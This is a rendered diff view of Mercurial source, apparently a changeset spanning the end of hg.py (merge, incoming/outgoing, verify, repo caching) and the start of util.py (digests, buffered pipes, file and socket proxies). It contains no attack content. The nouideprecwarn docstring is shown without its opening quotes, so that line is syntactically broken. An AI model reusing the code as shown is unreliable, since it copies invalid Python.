896 889 stats = mergemod.update(repo, node, True, force, mergeforce=mergeforce,
897 890 labels=labels)
898 891 else:
899 892 ms = mergemod.mergestate.read(repo)
900 893 if ms.active():
901 894 # there were conflicts
902 895 node = ms.localctx.hex()
903 896 else:
904 897 # there were no conflicts, mergestate was not stored
905 898 node = repo['.'].hex()
906 899
907 900 repo.ui.status(_("aborting the merge, updating back to"
908 901 " %s\n") % node[:12])
909 902 stats = mergemod.update(repo, node, branchmerge=False, force=True,
910 903 labels=labels)
911 904
912 905 _showstats(repo, stats)
913 906 if stats.unresolvedcount:
914 907 repo.ui.status(_("use 'hg resolve' to retry unresolved file merges "
915 908 "or 'hg merge --abort' to abandon\n"))
916 909 elif remind and not abort:
917 910 repo.ui.status(_("(branch merge, don't forget to commit)\n"))
918 911 return stats.unresolvedcount > 0
919 912
920 913 def _incoming(displaychlist, subreporecurse, ui, repo, source,
921 914 opts, buffered=False):
922 915 """
923 916 Helper for incoming / gincoming.
924 917 displaychlist gets called with
925 918 (remoterepo, incomingchangesetlist, displayer) parameters,
926 919 and is supposed to contain only code that can't be unified.
927 920 """
928 921 source, branches = parseurl(ui.expandpath(source), opts.get('branch'))
929 922 other = peer(repo, opts, source)
930 923 ui.status(_('comparing with %s\n') % util.hidepassword(source))
931 924 revs, checkout = addbranchrevs(repo, other, branches, opts.get('rev'))
932 925
933 926 if revs:
934 927 revs = [other.lookup(rev) for rev in revs]
935 928 other, chlist, cleanupfn = bundlerepo.getremotechanges(ui, repo, other,
936 929 revs, opts["bundle"], opts["force"])
937 930 try:
938 931 if not chlist:
939 932 ui.status(_("no changes found\n"))
940 933 return subreporecurse()
941 934 ui.pager('incoming')
942 935 displayer = logcmdutil.changesetdisplayer(ui, other, opts,
943 936 buffered=buffered)
944 937 displaychlist(other, chlist, displayer)
945 938 displayer.close()
946 939 finally:
947 940 cleanupfn()
948 941 subreporecurse()
949 942 return 0 # exit code is zero since we found incoming changes
950 943
951 944 def incoming(ui, repo, source, opts):
952 945 def subreporecurse():
953 946 ret = 1
954 947 if opts.get('subrepos'):
955 948 ctx = repo[None]
956 949 for subpath in sorted(ctx.substate):
957 950 sub = ctx.sub(subpath)
958 951 ret = min(ret, sub.incoming(ui, source, opts))
959 952 return ret
960 953
961 954 def display(other, chlist, displayer):
962 955 limit = logcmdutil.getlimit(opts)
963 956 if opts.get('newest_first'):
964 957 chlist.reverse()
965 958 count = 0
966 959 for n in chlist:
967 960 if limit is not None and count >= limit:
968 961 break
969 962 parents = [p for p in other.changelog.parents(n) if p != nullid]
970 963 if opts.get('no_merges') and len(parents) == 2:
971 964 continue
972 965 count += 1
973 966 displayer.show(other[n])
974 967 return _incoming(display, subreporecurse, ui, repo, source, opts)
975 968
976 969 def _outgoing(ui, repo, dest, opts):
977 970 path = ui.paths.getpath(dest, default=('default-push', 'default'))
978 971 if not path:
979 972 raise error.Abort(_('default repository not configured!'),
980 973 hint=_("see 'hg help config.paths'"))
981 974 dest = path.pushloc or path.loc
982 975 branches = path.branch, opts.get('branch') or []
983 976
984 977 ui.status(_('comparing with %s\n') % util.hidepassword(dest))
985 978 revs, checkout = addbranchrevs(repo, repo, branches, opts.get('rev'))
986 979 if revs:
987 980 revs = [repo[rev].node() for rev in scmutil.revrange(repo, revs)]
988 981
989 982 other = peer(repo, opts, dest)
990 983 outgoing = discovery.findcommonoutgoing(repo, other, revs,
991 984 force=opts.get('force'))
992 985 o = outgoing.missing
993 986 if not o:
994 987 scmutil.nochangesfound(repo.ui, repo, outgoing.excluded)
995 988 return o, other
996 989
997 990 def outgoing(ui, repo, dest, opts):
998 991 def recurse():
999 992 ret = 1
1000 993 if opts.get('subrepos'):
1001 994 ctx = repo[None]
1002 995 for subpath in sorted(ctx.substate):
1003 996 sub = ctx.sub(subpath)
1004 997 ret = min(ret, sub.outgoing(ui, dest, opts))
1005 998 return ret
1006 999
1007 1000 limit = logcmdutil.getlimit(opts)
1008 1001 o, other = _outgoing(ui, repo, dest, opts)
1009 1002 if not o:
1010 1003 cmdutil.outgoinghooks(ui, repo, other, opts, o)
1011 1004 return recurse()
1012 1005
1013 1006 if opts.get('newest_first'):
1014 1007 o.reverse()
1015 1008 ui.pager('outgoing')
1016 1009 displayer = logcmdutil.changesetdisplayer(ui, repo, opts)
1017 1010 count = 0
1018 1011 for n in o:
1019 1012 if limit is not None and count >= limit:
1020 1013 break
1021 1014 parents = [p for p in repo.changelog.parents(n) if p != nullid]
1022 1015 if opts.get('no_merges') and len(parents) == 2:
1023 1016 continue
1024 1017 count += 1
1025 1018 displayer.show(repo[n])
1026 1019 displayer.close()
1027 1020 cmdutil.outgoinghooks(ui, repo, other, opts, o)
1028 1021 recurse()
1029 1022 return 0 # exit code is zero since we found outgoing changes
1030 1023
1031 1024 def verify(repo):
1032 1025 """verify the consistency of a repository"""
1033 1026 ret = verifymod.verify(repo)
1034 1027
1035 1028 # Broken subrepo references in hidden csets don't seem worth worrying about,
1036 1029 # since they can't be pushed/pulled, and --hidden can be used if they are a
1037 1030 # concern.
1038 1031
1039 1032 # pathto() is needed for -R case
1040 1033 revs = repo.revs("filelog(%s)",
1041 1034 util.pathto(repo.root, repo.getcwd(), '.hgsubstate'))
1042 1035
1043 1036 if revs:
1044 1037 repo.ui.status(_('checking subrepo links\n'))
1045 1038 for rev in revs:
1046 1039 ctx = repo[rev]
1047 1040 try:
1048 1041 for subpath in ctx.substate:
1049 1042 try:
1050 1043 ret = (ctx.sub(subpath, allowcreate=False).verify()
1051 1044 or ret)
1052 1045 except error.RepoError as e:
1053 1046 repo.ui.warn(('%d: %s\n') % (rev, e))
1054 1047 except Exception:
1055 1048 repo.ui.warn(_('.hgsubstate is corrupt in revision %s\n') %
1056 1049 node.short(ctx.node()))
1057 1050
1058 1051 return ret
1059 1052
1060 1053 def remoteui(src, opts):
1061 1054 'build a remote ui from ui or repo and opts'
1062 1055 if util.safehasattr(src, 'baseui'): # looks like a repository
1063 1056 dst = src.baseui.copy() # drop repo-specific config
1064 1057 src = src.ui # copy target options from repo
1065 1058 else: # assume it's a global ui object
1066 1059 dst = src.copy() # keep all global options
1067 1060
1068 1061 # copy ssh-specific options
1069 1062 for o in 'ssh', 'remotecmd':
1070 1063 v = opts.get(o) or src.config('ui', o)
1071 1064 if v:
1072 1065 dst.setconfig("ui", o, v, 'copied')
1073 1066
1074 1067 # copy bundle-specific options
1075 1068 r = src.config('bundle', 'mainreporoot')
1076 1069 if r:
1077 1070 dst.setconfig('bundle', 'mainreporoot', r, 'copied')
1078 1071
1079 1072 # copy selected local settings to the remote ui
1080 1073 for sect in ('auth', 'hostfingerprints', 'hostsecurity', 'http_proxy'):
1081 1074 for key, val in src.configitems(sect):
1082 1075 dst.setconfig(sect, key, val, 'copied')
1083 1076 v = src.config('web', 'cacerts')
1084 1077 if v:
1085 1078 dst.setconfig('web', 'cacerts', util.expandpath(v), 'copied')
1086 1079
1087 1080 return dst
1088 1081
1089 1082 # Files of interest
1090 1083 # Used to check if the repository has changed looking at mtime and size of
1091 1084 # these files.
1092 1085 foi = [('spath', '00changelog.i'),
1093 1086 ('spath', 'phaseroots'), # ! phase can change content at the same size
1094 1087 ('spath', 'obsstore'),
1095 1088 ('path', 'bookmarks'), # ! bookmark can change content at the same size
1096 1089 ]
1097 1090
1098 1091 class cachedlocalrepo(object):
1099 1092 """Holds a localrepository that can be cached and reused."""
1100 1093
1101 1094 def __init__(self, repo):
1102 1095 """Create a new cached repo from an existing repo.
1103 1096
1104 1097 We assume the passed in repo was recently created. If the
1105 1098 repo has changed between when it was created and when it was
1106 1099 turned into a cache, it may not refresh properly.
1107 1100 """
1108 1101 assert isinstance(repo, localrepo.localrepository)
1109 1102 self._repo = repo
1110 1103 self._state, self.mtime = self._repostate()
1111 1104 self._filtername = repo.filtername
1112 1105
1113 1106 def fetch(self):
1114 1107 """Refresh (if necessary) and return a repository.
1115 1108
1116 1109 If the cached instance is out of date, it will be recreated
1117 1110 automatically and returned.
1118 1111
1119 1112 Returns a tuple of the repo and a boolean indicating whether a new
1120 1113 repo instance was created.
1121 1114 """
1122 1115 # We compare the mtimes and sizes of some well-known files to
1123 1116 # determine if the repo changed. This is not precise, as mtimes
1124 1117 # are susceptible to clock skew and imprecise filesystems and
1125 1118 # file content can change while maintaining the same size.
1126 1119
1127 1120 state, mtime = self._repostate()
1128 1121 if state == self._state:
1129 1122 return self._repo, False
1130 1123
1131 1124 repo = repository(self._repo.baseui, self._repo.url())
1132 1125 if self._filtername:
1133 1126 self._repo = repo.filtered(self._filtername)
1134 1127 else:
1135 1128 self._repo = repo.unfiltered()
1136 1129 self._state = state
1137 1130 self.mtime = mtime
1138 1131
1139 1132 return self._repo, True
1140 1133
1141 1134 def _repostate(self):
1142 1135 state = []
1143 1136 maxmtime = -1
1144 1137 for attr, fname in foi:
1145 1138 prefix = getattr(self._repo, attr)
1146 1139 p = os.path.join(prefix, fname)
1147 1140 try:
1148 1141 st = os.stat(p)
1149 1142 except OSError:
1150 1143 st = os.stat(prefix)
1151 1144 state.append((st[stat.ST_MTIME], st.st_size))
1152 1145 maxmtime = max(maxmtime, st[stat.ST_MTIME])
1153 1146
1154 1147 return tuple(state), maxmtime
1155 1148
1156 1149 def copy(self):
1157 1150 """Obtain a copy of this class instance.
1158 1151
1159 1152 A new localrepository instance is obtained. The new instance should be
1160 1153 completely independent of the original.
1161 1154 """
1162 1155 repo = repository(self._repo.baseui, self._repo.origroot)
1163 1156 if self._filtername:
1164 1157 repo = repo.filtered(self._filtername)
1165 1158 else:
1166 1159 repo = repo.unfiltered()
1167 1160 c = cachedlocalrepo(repo)
1168 1161 c._state = self._state
1169 1162 c.mtime = self.mtime
1170 1163 return c
@@ -1,3790 +1,3789 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from . import (
40 40 encoding,
41 41 error,
42 42 i18n,
43 43 node as nodemod,
44 44 policy,
45 45 pycompat,
46 46 urllibcompat,
47 47 )
48 48 from .utils import (
49 49 procutil,
50 50 stringutil,
51 51 )
52 52
53 53 base85 = policy.importmod(r'base85')
54 54 osutil = policy.importmod(r'osutil')
55 55 parsers = policy.importmod(r'parsers')
56 56
57 57 b85decode = base85.b85decode
58 58 b85encode = base85.b85encode
59 59
60 60 cookielib = pycompat.cookielib
61 61 httplib = pycompat.httplib
62 62 pickle = pycompat.pickle
63 63 safehasattr = pycompat.safehasattr
64 64 socketserver = pycompat.socketserver
65 65 bytesio = pycompat.bytesio
66 66 # TODO deprecate stringio name, as it is a lie on Python 3.
67 67 stringio = bytesio
68 68 xmlrpclib = pycompat.xmlrpclib
69 69
70 70 httpserver = urllibcompat.httpserver
71 71 urlerr = urllibcompat.urlerr
72 72 urlreq = urllibcompat.urlreq
73 73
74 74 # workaround for win32mbcs
75 75 _filenamebytestr = pycompat.bytestr
76 76
77 77 if pycompat.iswindows:
78 78 from . import windows as platform
79 79 else:
80 80 from . import posix as platform
81 81
82 82 _ = i18n._
83 83
84 84 bindunixsocket = platform.bindunixsocket
85 85 cachestat = platform.cachestat
86 86 checkexec = platform.checkexec
87 87 checklink = platform.checklink
88 88 copymode = platform.copymode
89 89 expandglobs = platform.expandglobs
90 90 getfsmountpoint = platform.getfsmountpoint
91 91 getfstype = platform.getfstype
92 92 groupmembers = platform.groupmembers
93 93 groupname = platform.groupname
94 94 isexec = platform.isexec
95 95 isowner = platform.isowner
96 96 listdir = osutil.listdir
97 97 localpath = platform.localpath
98 98 lookupreg = platform.lookupreg
99 99 makedir = platform.makedir
100 100 nlinks = platform.nlinks
101 101 normpath = platform.normpath
102 102 normcase = platform.normcase
103 103 normcasespec = platform.normcasespec
104 104 normcasefallback = platform.normcasefallback
105 105 openhardlinks = platform.openhardlinks
106 106 oslink = platform.oslink
107 107 parsepatchoutput = platform.parsepatchoutput
108 108 pconvert = platform.pconvert
109 109 poll = platform.poll
110 110 posixfile = platform.posixfile
111 111 rename = platform.rename
112 112 removedirs = platform.removedirs
113 113 samedevice = platform.samedevice
114 114 samefile = platform.samefile
115 115 samestat = platform.samestat
116 116 setflags = platform.setflags
117 117 split = platform.split
118 118 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
119 119 statisexec = platform.statisexec
120 120 statislink = platform.statislink
121 121 umask = platform.umask
122 122 unlink = platform.unlink
123 123 username = platform.username
124 124
125 125 try:
126 126 recvfds = osutil.recvfds
127 127 except AttributeError:
128 128 pass
129 129
130 130 # Python compatibility
131 131
132 132 _notset = object()
133 133
134 134 def _rapply(f, xs):
135 135 if xs is None:
136 136 # assume None means non-value of optional data
137 137 return xs
138 138 if isinstance(xs, (list, set, tuple)):
139 139 return type(xs)(_rapply(f, x) for x in xs)
140 140 if isinstance(xs, dict):
141 141 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
142 142 return f(xs)
143 143
144 144 def rapply(f, xs):
145 145 """Apply function recursively to every item preserving the data structure
146 146
147 147 >>> def f(x):
148 148 ... return 'f(%s)' % x
149 149 >>> rapply(f, None) is None
150 150 True
151 151 >>> rapply(f, 'a')
152 152 'f(a)'
153 153 >>> rapply(f, {'a'}) == {'f(a)'}
154 154 True
155 155 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
156 156 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
157 157
158 158 >>> xs = [object()]
159 159 >>> rapply(pycompat.identity, xs) is xs
160 160 True
161 161 """
162 162 if f is pycompat.identity:
163 163 # fast path mainly for py2
164 164 return xs
165 165 return _rapply(f, xs)
166 166
167 167 def bitsfrom(container):
168 168 bits = 0
169 169 for bit in container:
170 170 bits |= bit
171 171 return bits
172 172
173 173 # python 2.6 still have deprecation warning enabled by default. We do not want
174 174 # to display anything to standard user so detect if we are running test and
175 175 # only use python deprecation warning in this case.
176 176 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
177 177 if _dowarn:
178 178 # explicitly unfilter our warning for python 2.7
179 179 #
180 180 # The option of setting PYTHONWARNINGS in the test runner was investigated.
181 181 # However, module name set through PYTHONWARNINGS was exactly matched, so
182 182 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
183 183 # makes the whole PYTHONWARNINGS thing useless for our usecase.
184 184 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
185 185 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
186 186 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
187 187 if _dowarn and pycompat.ispy3:
188 188 # silence warning emitted by passing user string to re.sub()
189 189 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
190 190 r'mercurial')
191 191 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
192 192 DeprecationWarning, r'mercurial')
193 193 # TODO: reinvent imp.is_frozen()
194 194 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
195 195 DeprecationWarning, r'mercurial')
196 196
197 197 def nouideprecwarn(msg, version, stacklevel=1):
198 198 Issue a python native deprecation warning
199 199
200 200 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
201 201 """
202 202 if _dowarn:
203 203 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
204 204 " update your code.)") % version
205 205 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
206 206
207 207 DIGESTS = {
208 208 'md5': hashlib.md5,
209 209 'sha1': hashlib.sha1,
210 210 'sha512': hashlib.sha512,
211 211 }
212 212 # List of digest types from strongest to weakest
213 213 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
214 214
215 215 for k in DIGESTS_BY_STRENGTH:
216 216 assert k in DIGESTS
217 217
218 218 class digester(object):
219 219 """helper to compute digests.
220 220
221 221 This helper can be used to compute one or more digests given their name.
222 222
223 223 >>> d = digester([b'md5', b'sha1'])
224 224 >>> d.update(b'foo')
225 225 >>> [k for k in sorted(d)]
226 226 ['md5', 'sha1']
227 227 >>> d[b'md5']
228 228 'acbd18db4cc2f85cedef654fccc4a4d8'
229 229 >>> d[b'sha1']
230 230 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
231 231 >>> digester.preferred([b'md5', b'sha1'])
232 232 'sha1'
233 233 """
234 234
235 235 def __init__(self, digests, s=''):
236 236 self._hashes = {}
237 237 for k in digests:
238 238 if k not in DIGESTS:
239 239 raise error.Abort(_('unknown digest type: %s') % k)
240 240 self._hashes[k] = DIGESTS[k]()
241 241 if s:
242 242 self.update(s)
243 243
244 244 def update(self, data):
245 245 for h in self._hashes.values():
246 246 h.update(data)
247 247
248 248 def __getitem__(self, key):
249 249 if key not in DIGESTS:
250 250 raise error.Abort(_('unknown digest type: %s') % key)
251 251 return nodemod.hex(self._hashes[key].digest())
252 252
253 253 def __iter__(self):
254 254 return iter(self._hashes)
255 255
256 256 @staticmethod
257 257 def preferred(supported):
258 258 """returns the strongest digest type in both supported and DIGESTS."""
259 259
260 260 for k in DIGESTS_BY_STRENGTH:
261 261 if k in supported:
262 262 return k
263 263 return None
264 264
265 265 class digestchecker(object):
266 266 """file handle wrapper that additionally checks content against a given
267 267 size and digests.
268 268
269 269 d = digestchecker(fh, size, {'md5': '...'})
270 270
271 271 When multiple digests are given, all of them are validated.
272 272 """
273 273
274 274 def __init__(self, fh, size, digests):
275 275 self._fh = fh
276 276 self._size = size
277 277 self._got = 0
278 278 self._digests = dict(digests)
279 279 self._digester = digester(self._digests.keys())
280 280
281 281 def read(self, length=-1):
282 282 content = self._fh.read(length)
283 283 self._digester.update(content)
284 284 self._got += len(content)
285 285 return content
286 286
287 287 def validate(self):
288 288 if self._size != self._got:
289 289 raise error.Abort(_('size mismatch: expected %d, got %d') %
290 290 (self._size, self._got))
291 291 for k, v in self._digests.items():
292 292 if v != self._digester[k]:
293 293 # i18n: first parameter is a digest name
294 294 raise error.Abort(_('%s mismatch: expected %s, got %s') %
295 295 (k, v, self._digester[k]))
296 296
297 297 try:
298 298 buffer = buffer
299 299 except NameError:
300 300 def buffer(sliceable, offset=0, length=None):
301 301 if length is not None:
302 302 return memoryview(sliceable)[offset:offset + length]
303 303 return memoryview(sliceable)[offset:]
304 304
305 305 _chunksize = 4096
306 306
307 307 class bufferedinputpipe(object):
308 308 """a manually buffered input pipe
309 309
310 310 Python will not let us use buffered IO and lazy reading with 'polling' at
311 311 the same time. We cannot probe the buffer state and select will not detect
312 312 that data are ready to read if they are already buffered.
313 313
314 314 This class lets us work around that by implementing its own buffering
315 315 (allowing efficient readline) while offering a way to know if the buffer is
316 316 empty from the output (allowing collaboration of the buffer with polling).
317 317
318 318 This class lives in the 'util' module because it makes use of the 'os'
319 319 module from the python stdlib.
320 320 """
321 321 def __new__(cls, fh):
322 322 # If we receive a fileobjectproxy, we need to use a variation of this
323 323 # class that notifies observers about activity.
324 324 if isinstance(fh, fileobjectproxy):
325 325 cls = observedbufferedinputpipe
326 326
327 327 return super(bufferedinputpipe, cls).__new__(cls)
328 328
329 329 def __init__(self, input):
330 330 self._input = input
331 331 self._buffer = []
332 332 self._eof = False
333 333 self._lenbuf = 0
334 334
335 335 @property
336 336 def hasbuffer(self):
337 337 """True is any data is currently buffered
338 338
339 339 This will be used externally as a pre-step for polling IO. If there is
340 340 already data then no polling should be set in place."""
341 341 return bool(self._buffer)
342 342
343 343 @property
344 344 def closed(self):
345 345 return self._input.closed
346 346
347 347 def fileno(self):
348 348 return self._input.fileno()
349 349
350 350 def close(self):
351 351 return self._input.close()
352 352
353 353 def read(self, size):
354 354 while (not self._eof) and (self._lenbuf < size):
355 355 self._fillbuffer()
356 356 return self._frombuffer(size)
357 357
358 358 def readline(self, *args, **kwargs):
359 359 if 1 < len(self._buffer):
360 360 # this should not happen because both read and readline end with a
361 361 # _frombuffer call that collapses it.
362 362 self._buffer = [''.join(self._buffer)]
363 363 self._lenbuf = len(self._buffer[0])
364 364 lfi = -1
365 365 if self._buffer:
366 366 lfi = self._buffer[-1].find('\n')
367 367 while (not self._eof) and lfi < 0:
368 368 self._fillbuffer()
369 369 if self._buffer:
370 370 lfi = self._buffer[-1].find('\n')
371 371 size = lfi + 1
372 372 if lfi < 0: # end of file
373 373 size = self._lenbuf
374 374 elif 1 < len(self._buffer):
375 375 # we need to take previous chunks into account
376 376 size += self._lenbuf - len(self._buffer[-1])
377 377 return self._frombuffer(size)
378 378
379 379 def _frombuffer(self, size):
380 380 """return at most 'size' data from the buffer
381 381
382 382 The data are removed from the buffer."""
383 383 if size == 0 or not self._buffer:
384 384 return ''
385 385 buf = self._buffer[0]
386 386 if 1 < len(self._buffer):
387 387 buf = ''.join(self._buffer)
388 388
389 389 data = buf[:size]
390 390 buf = buf[len(data):]
391 391 if buf:
392 392 self._buffer = [buf]
393 393 self._lenbuf = len(buf)
394 394 else:
395 395 self._buffer = []
396 396 self._lenbuf = 0
397 397 return data
398 398
399 399 def _fillbuffer(self):
400 400 """read data to the buffer"""
401 401 data = os.read(self._input.fileno(), _chunksize)
402 402 if not data:
403 403 self._eof = True
404 404 else:
405 405 self._lenbuf += len(data)
406 406 self._buffer.append(data)
407 407
408 408 return data
409 409
410 410 def mmapread(fp):
411 411 try:
412 412 fd = getattr(fp, 'fileno', lambda: fp)()
413 413 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
414 414 except ValueError:
415 415 # Empty files cannot be mmapped, but mmapread should still work. Check
416 416 # if the file is empty, and if so, return an empty buffer.
417 417 if os.fstat(fd).st_size == 0:
418 418 return ''
419 419 raise
420 420
421 421 class fileobjectproxy(object):
422 422 """A proxy around file objects that tells a watcher when events occur.
423 423
424 424 This type is intended to only be used for testing purposes. Think hard
425 425 before using it in important code.
426 426 """
427 427 __slots__ = (
428 428 r'_orig',
429 429 r'_observer',
430 430 )
431 431
432 432 def __init__(self, fh, observer):
433 433 object.__setattr__(self, r'_orig', fh)
434 434 object.__setattr__(self, r'_observer', observer)
435 435
436 436 def __getattribute__(self, name):
437 437 ours = {
438 438 r'_observer',
439 439
440 440 # IOBase
441 441 r'close',
442 442 # closed if a property
443 443 r'fileno',
444 444 r'flush',
445 445 r'isatty',
446 446 r'readable',
447 447 r'readline',
448 448 r'readlines',
449 449 r'seek',
450 450 r'seekable',
451 451 r'tell',
452 452 r'truncate',
453 453 r'writable',
454 454 r'writelines',
455 455 # RawIOBase
456 456 r'read',
457 457 r'readall',
458 458 r'readinto',
459 459 r'write',
460 460 # BufferedIOBase
461 461 # raw is a property
462 462 r'detach',
463 463 # read defined above
464 464 r'read1',
465 465 # readinto defined above
466 466 # write defined above
467 467 }
468 468
469 469 # We only observe some methods.
470 470 if name in ours:
471 471 return object.__getattribute__(self, name)
472 472
473 473 return getattr(object.__getattribute__(self, r'_orig'), name)
474 474
475 475 def __nonzero__(self):
476 476 return bool(object.__getattribute__(self, r'_orig'))
477 477
478 478 __bool__ = __nonzero__
479 479
480 480 def __delattr__(self, name):
481 481 return delattr(object.__getattribute__(self, r'_orig'), name)
482 482
483 483 def __setattr__(self, name, value):
484 484 return setattr(object.__getattribute__(self, r'_orig'), name, value)
485 485
486 486 def __iter__(self):
487 487 return object.__getattribute__(self, r'_orig').__iter__()
488 488
489 489 def _observedcall(self, name, *args, **kwargs):
490 490 # Call the original object.
491 491 orig = object.__getattribute__(self, r'_orig')
492 492 res = getattr(orig, name)(*args, **kwargs)
493 493
494 494 # Call a method on the observer of the same name with arguments
495 495 # so it can react, log, etc.
496 496 observer = object.__getattribute__(self, r'_observer')
497 497 fn = getattr(observer, name, None)
498 498 if fn:
499 499 fn(res, *args, **kwargs)
500 500
501 501 return res
502 502
503 503 def close(self, *args, **kwargs):
504 504 return object.__getattribute__(self, r'_observedcall')(
505 505 r'close', *args, **kwargs)
506 506
507 507 def fileno(self, *args, **kwargs):
508 508 return object.__getattribute__(self, r'_observedcall')(
509 509 r'fileno', *args, **kwargs)
510 510
511 511 def flush(self, *args, **kwargs):
512 512 return object.__getattribute__(self, r'_observedcall')(
513 513 r'flush', *args, **kwargs)
514 514
515 515 def isatty(self, *args, **kwargs):
516 516 return object.__getattribute__(self, r'_observedcall')(
517 517 r'isatty', *args, **kwargs)
518 518
519 519 def readable(self, *args, **kwargs):
520 520 return object.__getattribute__(self, r'_observedcall')(
521 521 r'readable', *args, **kwargs)
522 522
523 523 def readline(self, *args, **kwargs):
524 524 return object.__getattribute__(self, r'_observedcall')(
525 525 r'readline', *args, **kwargs)
526 526
527 527 def readlines(self, *args, **kwargs):
528 528 return object.__getattribute__(self, r'_observedcall')(
529 529 r'readlines', *args, **kwargs)
530 530
531 531 def seek(self, *args, **kwargs):
532 532 return object.__getattribute__(self, r'_observedcall')(
533 533 r'seek', *args, **kwargs)
534 534
535 535 def seekable(self, *args, **kwargs):
536 536 return object.__getattribute__(self, r'_observedcall')(
537 537 r'seekable', *args, **kwargs)
538 538
539 539 def tell(self, *args, **kwargs):
540 540 return object.__getattribute__(self, r'_observedcall')(
541 541 r'tell', *args, **kwargs)
542 542
543 543 def truncate(self, *args, **kwargs):
544 544 return object.__getattribute__(self, r'_observedcall')(
545 545 r'truncate', *args, **kwargs)
546 546
547 547 def writable(self, *args, **kwargs):
548 548 return object.__getattribute__(self, r'_observedcall')(
549 549 r'writable', *args, **kwargs)
550 550
551 551 def writelines(self, *args, **kwargs):
552 552 return object.__getattribute__(self, r'_observedcall')(
553 553 r'writelines', *args, **kwargs)
554 554
555 555 def read(self, *args, **kwargs):
556 556 return object.__getattribute__(self, r'_observedcall')(
557 557 r'read', *args, **kwargs)
558 558
559 559 def readall(self, *args, **kwargs):
560 560 return object.__getattribute__(self, r'_observedcall')(
561 561 r'readall', *args, **kwargs)
562 562
563 563 def readinto(self, *args, **kwargs):
564 564 return object.__getattribute__(self, r'_observedcall')(
565 565 r'readinto', *args, **kwargs)
566 566
567 567 def write(self, *args, **kwargs):
568 568 return object.__getattribute__(self, r'_observedcall')(
569 569 r'write', *args, **kwargs)
570 570
571 571 def detach(self, *args, **kwargs):
572 572 return object.__getattribute__(self, r'_observedcall')(
573 573 r'detach', *args, **kwargs)
574 574
575 575 def read1(self, *args, **kwargs):
576 576 return object.__getattribute__(self, r'_observedcall')(
577 577 r'read1', *args, **kwargs)
578 578
579 579 class observedbufferedinputpipe(bufferedinputpipe):
580 580 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
581 581
582 582 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
583 583 bypass ``fileobjectproxy``. Because of this, we need to make
584 584 ``bufferedinputpipe`` aware of these operations.
585 585
586 586 This variation of ``bufferedinputpipe`` can notify observers about
587 587 ``os.read()`` events. It also re-publishes other events, such as
588 588 ``read()`` and ``readline()``.
589 589 """
590 590 def _fillbuffer(self):
591 591 res = super(observedbufferedinputpipe, self)._fillbuffer()
592 592
593 593 fn = getattr(self._input._observer, r'osread', None)
594 594 if fn:
595 595 fn(res, _chunksize)
596 596
597 597 return res
598 598
599 599 # We use different observer methods because the operation isn't
600 600 # performed on the actual file object but on us.
601 601 def read(self, size):
602 602 res = super(observedbufferedinputpipe, self).read(size)
603 603
604 604 fn = getattr(self._input._observer, r'bufferedread', None)
605 605 if fn:
606 606 fn(res, size)
607 607
608 608 return res
609 609
610 610 def readline(self, *args, **kwargs):
611 611 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
612 612
613 613 fn = getattr(self._input._observer, r'bufferedreadline', None)
614 614 if fn:
615 615 fn(res)
616 616
617 617 return res
618 618
619 619 PROXIED_SOCKET_METHODS = {
620 620 r'makefile',
621 621 r'recv',
622 622 r'recvfrom',
623 623 r'recvfrom_into',
624 624 r'recv_into',
625 625 r'send',
626 626 r'sendall',
627 627 r'sendto',
628 628 r'setblocking',
629 629 r'settimeout',
630 630 r'gettimeout',
631 631 r'setsockopt',
632 632 }
633 633
634 634 class socketproxy(object):
635 635 """A proxy around a socket that tells a watcher when events occur.
636 636
637 637 This is like ``fileobjectproxy`` except for sockets.
638 638
639 639 This type is intended to only be used for testing purposes. Think hard
640 640 before using it in important code.
641 641 """
642 642 __slots__ = (
643 643 r'_orig',
644 644 r'_observer',
645 645 )
646 646
647 647 def __init__(self, sock, observer):
648 648 object.__setattr__(self, r'_orig', sock)
649 649 object.__setattr__(self, r'_observer', observer)
650 650
651 651 def __getattribute__(self, name):
652 652 if name in PROXIED_SOCKET_METHODS:
653 653 return object.__getattribute__(self, name)
654 654
655 655 return getattr(object.__getattribute__(self, r'_orig'), name)
656 656
657 657 def __delattr__(self, name):
658 658 return delattr(object.__getattribute__(self, r'_orig'), name)
659 659
660 660 def __setattr__(self, name, value):
661 661 return setattr(object.__getattribute__(self, r'_orig'), name, value)
662 662
663 663 def __nonzero__(self):
664 664 return bool(object.__getattribute__(self, r'_orig'))
665 665
666 666 __bool__ = __nonzero__
667 667
668 668 def _observedcall(self, name, *args, **kwargs):
669 669 # Call the original object.
